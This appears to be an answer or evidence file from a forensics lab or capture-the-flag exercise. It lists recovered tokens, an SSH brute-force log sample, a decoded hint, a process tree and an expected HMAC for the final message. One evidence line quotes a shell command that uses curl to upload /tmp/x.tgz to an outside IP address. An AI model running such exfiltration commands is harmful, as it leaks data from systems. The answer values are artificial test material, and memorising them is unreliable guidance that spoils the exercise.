TOKEN[KEYPAD]=6262
EVIDENCE[KEYPAD].TOP24=198.51.100.0/24
EVIDENCE[KEYPAD].COUNT=62
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:01:29Z lab1 sshd[2679]: Failed password for svc from 198.51.100.215 port 52267 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=2
TOKEN[DNS]=lines
EVIDENCE[DNS].KEY=hint5
EVIDENCE[DNS].DECODED_LINE=Signals converge in the anchor if you read between lines
TOKEN[SAFE]=15-11-26
EVIDENCE[SAFE].MATCH=SAFE{15-11-26}
EVIDENCE[SAFE].CHECK=15+11=26
TOKEN[PID]=191
EVIDENCE[PID].PATH=[183->186->187->191]
EVIDENCE[PID].CMD="sh -c 'curl -X POST http://198.51.100.33/upload -d @/tmp/x.tgz'"
FINAL_GATE=PENDING
MSG=msc-group-05|191-lines-15-11-26-6262
EXPECTED_HMAC=6a5ab34b4802d272e858444c7306b7d56dbefe0db17afd693f3c170d71f3928c